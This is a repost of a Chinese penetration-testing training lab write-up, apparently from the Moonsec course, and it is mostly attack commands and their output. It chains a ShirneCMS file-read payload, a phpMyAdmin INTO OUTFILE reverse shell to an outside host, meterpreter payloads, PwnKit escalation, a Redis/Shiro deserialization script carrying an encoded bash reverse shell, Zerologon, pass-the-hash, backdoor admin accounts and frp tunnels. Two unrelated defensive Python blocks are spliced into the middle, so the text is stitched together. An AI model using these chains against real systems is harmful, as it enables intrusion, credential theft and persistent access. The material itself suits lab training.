Moonsec (暗月) Penetration Testing May Assessment, Article 2

admin, 2023-05-25 11:57:49, 160 views, 11,701 characters, 39 min read

Introduction

The walkthrough video for this Sunday lab has been made into a training course.

There is still a promotional price on 5.20.

If you want to learn, you can join Moonsec's penetration testing training.

Scan the QR code to add us as a friend and ask about the course.


Topics covered

This assessment covers PHP code auditing and Java code auditing.

The internal network is fairly simple: once you are inside the domain, taking the domain controller is not much of a problem.

Find the web entry point, get into the internal network, and from there it is easy to obtain domain controller privileges.

Topology

[Topology diagram]

Assessment results

100 people took part this time and 6 passed. The pass rate is not high, but I am still fairly satisfied with it.

Below is the second write-up from the students who passed; it is all solid material.

WEB

WEB123

Visiting the URL shows ShirneCMS. After information gathering: this CMS has an arbitrary file read vulnerability. Admin address:

http://103.149.90.210/index.php/admin

Read the configuration files with the source code alongside for reference. Source:

https://gitee.com/shirnecn/ShirneCMS/tree/master/src

Read the database configuration file

payload

http://103.149.90.210/static/ueditor/php/controller.php?action=proxy&remote=php://filter/convert.base64-encode|convert.base64-encode|convert.base64-encode|convert.base64-encode|convert.base64-encode|convert.base64-encode/resource=../../../config/database.php&maxwidth=-1&referer=test
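As an added defensive example (not code from the original write-up): a small Python access-log scanner that flags requests to the ueditor proxy endpoint whose remote= parameter carries a PHP stream wrapper or path traversal, the pattern of the payload above. The endpoint path is the one on this page; the log lines, client IPs and timestamps are constructed for the example, in common Apache/Nginx combined format.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Constructed sample access-log lines (client IPs and timestamps made up for this example).
SAMPLE_LOG = """\
203.0.113.5 - - [25/May/2023:11:57:49 +0800] "GET /static/ueditor/php/controller.php?action=proxy&remote=php://filter/convert.base64-encode|convert.base64-encode/resource=../../../config/database.php&maxwidth=-1&referer=test HTTP/1.1" 200 1834
203.0.113.6 - - [25/May/2023:11:58:02 +0800] "GET /static/ueditor/php/controller.php?action=proxy&remote=http://img.example.com/a.png HTTP/1.1" 200 5120
203.0.113.7 - - [25/May/2023:11:58:30 +0800] "GET /index.php/admin HTTP/1.1" 302 0
"""

LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})')

# Stream wrappers that turn the "remote URL" parameter of a proxy into a local file read.
WRAPPER_RE = re.compile(r'^(php|file|phar|glob|data|zip|compress\.\w+)://', re.IGNORECASE)

def classify_request(target):
    """Return a list of finding strings for one request target, or [] if it looks benign."""
    parts = urlsplit(target)
    findings = []
    if not parts.path.endswith("/ueditor/php/controller.php"):
        return findings
    for raw in parse_qs(parts.query, keep_blank_values=True).get("remote", []):
        value = unquote(raw)  # parse_qs decoded once; decode again to catch double encoding
        if WRAPPER_RE.match(value):
            findings.append("stream wrapper in remote=: " + value.split("/resource=")[0])
        if "../" in value or "..\\" in value:
            findings.append("path traversal in remote=")
        if "convert.base64-encode" in value:
            findings.append("base64 filter chain (file read disguised as a proxy fetch)")
    return findings

def scan_log(text):
    """Parse access-log lines; return (ip, timestamp, findings) for each suspicious request."""
    hits = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        findings = classify_request(m.group("target"))
        if findings:
            hits.append((m.group("ip"), m.group("ts"), findings))
    return hits

if __name__ == "__main__":
    for ip, ts, findings in scan_log(SAMPLE_LOG):
        print(ip, ts, "; ".join(findings))
```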

Key information

return [
    // database type
    'type'     => 'mysql',
    // server address
    'hostname' => 'localhost',
    // database name
    'database' => 'cms',
    // username
    'username' => 'root',
    // password
    'password' => 'vVICDU1Erw',

We have a username and password, but remote connections are not allowed.

yakit found phpMyAdmin: http://103.149.90.210:80/phpmyadmin/index.php


Log in with the database credentials just read. After logging in, find the table that stores the site's backend admin users; the passwords are salted MD5.



Download the source code and look for the hashing method: search the whole tree for $salt


Follow encode_passwd


It can be seen that the hashing method is md5(a randomly generated 8-character salt + password). Write a script that generates a password hash:

<?php
include('application/common.php');
// generate an 8-character random salt with the CMS's own helper
$salt = random_str(8);

// the password to hash
$password = 'xcc@123';

// call the CMS's encode_password() function
$encrypted_password = encode_password($password, $salt);

// print the hash and the salt
echo $encrypted_password . "\n";
echo $salt;

Open it directly in the browser to get the password hash and salt.
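As an added example, not the CMS's or the author's code: the md5(salt + password) scheme described above re-implemented in Python beside a PBKDF2 replacement, with a login helper that transparently re-hashes legacy rows, which is how a site like this one would retire the weak scheme without forcing resets. The helper name random_str mirrors the CMS only by name, and the row columns 'password' and 'salt' are assumed.

```python
import hashlib
import hmac
import os
import secrets
import string

# The CMS scheme the page describes: md5(salt . password) with an 8-character random salt.
# Re-implemented here for illustration; the CMS's own helpers are random_str()/encode_password().
SALT_CHARS = string.ascii_letters + string.digits

def random_str(length=8):
    return "".join(secrets.choice(SALT_CHARS) for _ in range(length))

def legacy_hash(password, salt):
    """Hex MD5 of salt followed by password, as stored in the admin table."""
    return hashlib.md5((salt + password).encode()).hexdigest()

def legacy_verify(password, stored_hash, salt):
    return hmac.compare_digest(legacy_hash(password, salt), stored_hash)

# Replacement scheme: PBKDF2-HMAC-SHA256, 16-byte salt, high iteration count.
# Whoever dumps the table (as happened here via phpMyAdmin) must pay this cost per guess.
ITERATIONS = 600_000

def strong_hash(password, salt=None):
    salt = os.urandom(16) if salt is None else salt
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, ITERATIONS)
    return "pbkdf2_sha256$%d$%s$%s" % (ITERATIONS, salt.hex(), digest.hex())

def strong_verify(password, encoded):
    _algo, iters, salt_hex, digest_hex = encoded.split("$")
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), bytes.fromhex(salt_hex), int(iters))
    return hmac.compare_digest(digest.hex(), digest_hex)

def login_and_upgrade(user, password):
    """Verify `user` (dict with assumed 'password' and 'salt' columns) against whichever format
    the row holds, and re-hash legacy MD5 rows with PBKDF2 on a successful login."""
    stored = user["password"]
    if stored.startswith("pbkdf2_sha256$"):
        return strong_verify(password, stored)
    if legacy_verify(password, stored, user["salt"]):
        user["password"] = strong_hash(password)
        user["salt"] = ""          # the salt now lives inside the encoded string
        return True
    return False
```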


With the hash, go straight to phpMyAdmin and create an admin user

9a776d9a18b61b59dd42844f2f39c071 BzqYHwbz


Log in to the backend at http://103.149.90.210/index.php/admin; the backend has a file inclusion vulnerability

rrr/xcc@234

Category management, add a category, and set the category alias to: ../../../../../../tmp


In phpMyAdmin, write a reverse shell PHP file to /tmp


select '<?php system("bash -c \'bash -i >& /dev/tcp/1.1.1.1/9090 0>&1\'"); ?>' into outfile '/tmp/view.tpl'

Create an article


Listen on the VPS

nc -lnvp 9090

Visit the article and the reverse shell comes back


Generate a payload with msfvenom, start an msf listener, upload the payload to the web server, give it execute permission and run it


msfvenom -p linux/x64/meterpreter/reverse_tcp lhost=11.111.111.111 lport=9091 -f elf -o xx

use exploit/multi/handler
set payload linux/x64/meterpreter/reverse_tcp
set lhost 127.0.0.1
set lport 9091
run

chmod +x xx
./xx

After getting the shell, run whoami and check the OS and kernel version


meterpreter > sysinfo
Computer     : 192.168.10.174
OS           : Ubuntu 16.04 (Linux 4.13.0-36-generic)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux

Upload the privilege escalation check script linux-exploit-suggester.sh; escalate with CVE-2021-4034

https://github.com/berdav/CVE-2021-4034

meterpreter > upload /home/kali/桌面/cve-2021-4034.sh
meterpreter > shell
python3 -c 'import pty; pty.spawn("/bin/bash")'
www-data@web123:~/html/public/xxx$ chmod 777 cve-2021-4034.sh
www-data@web123:~/html/public/xxx$ ./cve-2021-4034.sh

After escalating, run the CS payload as root


Find the flag in the root directory

Give msf a root shell as well: just run the msf payload uploaded earlier


Internal network

WEB

Upload fscan and scan 192.168.10.135; Redis is present

[+] Redis:192.168.10.175:6379 abc123 file:/var/lib/redis/dump.rdb 
[+] Redis:192.168.10.175:6379 like can write /var/spool/cron/

Run a proxy in msf

Connect to Redis through the proxy and check its info; it is Linux.

proxychains4 redis-cli -h 192.168.10.175 -p 6379

192.168.10.175:6379> info
# Server
redis_version:5.0.7
redis_git_sha1:00000000
redis_git_dirty:0
redis_build_id:66bd629f924ac924
redis_mode:standalone
os:Linux 5.4.0-148-generic x86_64
arch_bits:64
multiplexing_api:epoll
atomicvar_api:atomic-builtin
gcc_version:9.3.0
process_id:912
run_id:904aee777d5087ca561c0934c5dd14e5229a0893
tcp_port:6379

Use a script to get a reverse shell through deserialization

bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC9pcC85MDkwIDA+JjE=}|{base64,-d}|{bash,-i}

import pyyso
import socket

s = socket.socket()
s.connect(("192.168.10.175", 6379))
redis_password = "abc123"
# RESP: AUTH <password>
s.send(b"*2\r\n$4\r\nAUTH\r\n$" + str(len(redis_password)).encode() + b"\r\n" + redis_password.encode() + b"\r\n")
whatever = b"yuy"
key = b"shiro:session:" + whatever
value = pyyso.cb1v192("bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC9pcC85MDkwIDA+JjE=}|{base64,-d}|{bash,-i}")
# RESP: SET <key> <value>  (*3 / $3 SET / $len key / $len value)
s.send(b"\x2a\x33\x0d\x0a\x24\x33\x0d\x0aSET\r\n\x24" + str(len(key)).encode() + b"\r\n" + key + b"\r\n\x24" + str(len(value)).encode() + b"\r\n" + value + b"\r\n")
if b"+OK" in s.recv(3):
    print("success")

Download the msf payload remotely and get a reverse shell back to msf for information gathering

meterpreter > sysinfo
Computer     : 192.168.10.175
OS           : Ubuntu 20.04 (Linux 5.4.0-148-generic)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux

Upload the check script to look for privilege escalation vulnerabilities

Available information:

Kernel version: 5.4.0
Architecture: x86_64
Distribution: ubuntu
Distribution version: 20.04
Additional checks (CONFIG_*, sysctl entries, custom Bash commands): performed
Package listing: from current OS

Searching among:

81 kernel space exploits
49 user space exploits

Possible Exploits:

cat: write error: Broken pipe
cat: write error: Broken pipe

[+] [CVE-2022-2586] nft_object UAF

   Details: https://www.openwall.com/lists/oss-security/2022/08/29/5
   Exposure: probable
   Tags: [ ubuntu=(20.04) ]{kernel:5.12.13}
   Download URL: https://www.openwall.com/lists/oss-security/2022/08/29/5/1
   Comments: kernel.unprivileged_userns_clone=1 required (to obtain CAP_NET_ADMIN)

[+] [CVE-2021-4034] PwnKit

   Details: https://www.qualys.com/2022/01/25/cve-2021-4034/pwnkit.txt
   Exposure: probable
   Tags: [ ubuntu=10|11|12|13|14|15|16|17|18|19|20|21 ],debian=7|8|9|10|11,fedora,manjaro
   Download URL: https://codeload.github.com/berdav/CVE-2021-4034/zip/main

[+] [CVE-2021-3156] sudo Baron Samedit

   Details: https://www.qualys.com/2021/01/26/cve-2021-3156/baron-samedit-heap-based-overflow-sudo.txt
   Exposure: probable
   Tags: mint=19,[ ubuntu=18|20 ], debian=10
   Download URL: https://codeload.github.com/blasty/CVE-2021-3156/zip/main

[+] [CVE-2021-3156] sudo Baron Samedit 2

   Details: https://www.qualys.com/2021/01/26/cve-2021-3156/baron-samedit-heap-based-overflow-sudo.txt
   Exposure: probable
   Tags: centos=6|7|8,[ ubuntu=14|16|17|18|19|20 ], debian=9|10
   Download URL: https://codeload.github.com/worawit/CVE-2021-3156/zip/main

[+] [CVE-2021-22555] Netfilter heap out-of-bounds write

   Details: https://google.github.io/security-research/pocs/linux/cve-2021-22555/writeup.html
   Exposure: probable
   Tags: [ ubuntu=20.04 ]{kernel:5.8.0-*}
   Download URL: https://raw.githubusercontent.com/google/security-research/master/pocs/linux/cve-2021-22555/exploit.c
   ext-url: https://raw.githubusercontent.com/bcoles/kernel-exploits/master/CVE-2021-22555/exploit.c
   Comments: ip_tables kernel module must be loaded

[+] [CVE-2022-32250] nft_object UAF (NFT_MSG_NEWSET)

   Details: https://research.nccgroup.com/2022/09/01/settlers-of-netlink-exploiting-a-limited-uaf-in-nf_tables-cve-2022-32250/
   https://blog.theori.io/research/CVE-2022-32250-linux-kernel-lpe-2022/
   Exposure: less probable
   Tags: ubuntu=(22.04){kernel:5.15.0-27-generic}
   Download URL: https://raw.githubusercontent.com/theori-io/CVE-2022-32250-exploit/main/exp.c
   Comments: kernel.unprivileged_userns_clone=1 required (to obtain CAP_NET_ADMIN)

[+] [CVE-2017-5618] setuid screen v4.5.0 LPE

   Details: https://seclists.org/oss-sec/2017/q1/184
   Exposure: less probable
   Download URL: https://www.exploit-db.com/download/https://www.exploit-db.com/exploits/41154

Search for privilege escalation exploits in msf

run post/multi/recon/local_exploit_suggester
[*] 127.0.0.1 - Collecting local exploits for x64/linux...
[*] 127.0.0.1 - 176 exploit checks are being tried...
[+] 127.0.0.1 - exploit/linux/local/cve_2021_3493_overlayfs: The target appears to be vulnerable.
[+] 127.0.0.1 - exploit/linux/local/cve_2022_0995_watch_queue: The target appears to be vulnerable.
[+] 127.0.0.1 - exploit/linux/local/su_login: The target appears to be vulnerable.
[*] Running check method for exploit 57 / 57
[*] 127.0.0.1 - Valid modules for session 45:
=============================

 #  Name                                           Potentially Vulnerable?  Check Result
 -  ----                                           -----------------------  ------------
 1  exploit/linux/local/cve_2021_3493_overlayfs    Yes                      The target appears to be vulnerable.
 2  exploit/linux/local/cve_2022_0995_watch_queue  Yes                      The target appears to be vulnerable.
 3  exploit/linux/local/su_login                   Yes                      The target appears to be vulnerable.

Tried the CVEs, scheduled tasks and SUID binaries; none of them gave root.

Then a turn of luck: browsing directories from the webshell turned up an SSH private key


It was found under home/web, so I tried to SSH to web with it, but that did not work. The earlier scan showed 192.168.10.172 with only port 22 open, so I connected to 172 as root directly, and it succeeded.

PC1


ssh -T -i id_rsa [email protected] /bin/bash

AD2012

Upload fscan and scan the two hosts on the 10 segment

There are a mail server and a domain controller, which gives us the domain FQDN

[*] NetBios: 10.10.10.137    exchange.sunday.club
[*] 10.10.10.133
   [->]ad2012
   [->]10.10.10.133

Use the CVE-2020-1472 PoC to test whether the vulnerability exists

python3 zerologon_tester.py ad2012 10.10.10.133

It reports that it is vulnerable

Success! DC can be fully compromised by a Zerologon attack.

Set the domain controller's password to empty

proxychains4 python3 cve-2020-1472-exploit.py ad2012 10.10.10.133

Dump the hashes

proxychains4 python3 secretsdump.py sunday.club/[email protected] -no-pass
sunday.club\Administrator:500:aad3b435b51404eeaad3b435b51404ee:7e6f1603cd213e33e7734613258caffe

Log in to the domain controller with the hash

python3 wmiexec.py -hashes aad3b435b51404eeaad3b435b51404ee:7e6f1603cd213e33e7734613258caffe sunday.club/[email protected]

Enable 3389

wmic RDTOGGLE WHERE ServerName='%COMPUTERNAME%' call SetAllowTSConnections 1
netstat -an|find "3389"

Allow it through the firewall

netsh firewall add portopening protocol = TCP port = 3389 name = rdp

Create an admin user

net user cc aaa@123 /add
net localgroup administrators cc /add

Use frp for tunnelling to proxy the 10 segment out

Run frpc and frps on 192.168.10.175. frpc configuration:

[common]
server_addr = 1.1.1.1
server_port = 7000

[socks]
type = tcp
remote_port = 9098
plugin = socks5

frps configuration:

[common] 
bind_port = 7000

Run frpc on 192.168.10.172

[common]
server_addr = 192.168.10.175
server_port = 7000

[socks]
type = tcp
remote_port = 9099
plugin = socks5

Connect to the domain controller via Remote Desktop


Exchange

Use CVE-2021-26855 + CVE-2021-27065 to achieve RCE

.ProxyLogon.py --host=10.10.10.137 [email protected]
https://10.10.10.137/aspnet_client/WXcOasRuSA.aspx?command=Response.Write(new ActivexObject("wscript.shell").exec("whoami").Stdout.ReadAll());

Replace the command inside exec(); however, this did not succeed.

A different approach: since we already have the domain controller hash, we can move laterally directly with msf's psexec

# domain controller

use exploit/windows/smb/psexec
set payload windows/x64/meterpreter/bind_tcp
set lport 9092
set rhost 10.10.10.133
set smbuser administrator
set smbpass aad3b435b51404eeaad3b435b51404ee:7e6f1603cd213e33e7734613258caffe
set smbdomain sunday.club
run

# mail server: just change the IP
set rhost 10.10.10.137
run

Done!

Flag

moonsec_flag{bbb0ae8a2c7d0ecc589621699f28afde}
moonsec_flag{17d03da6474ce8beb13b01e79f789e63}
moonsec_flag{26d300091986f45ca21d1cd6b7b79832}
moonsec_flag{6d4db5ff0c117864a02827bad3c361b9}
moonsec_flag{a81c3d94aa192d3f87ed9f2fffec04fc}


This article was originally published on the WeChat official account (moonsec): Moonsec Penetration Testing May Assessment, Article 2

Reposted at CN-SEC: http://cn-sec.com/archives/1751160.html
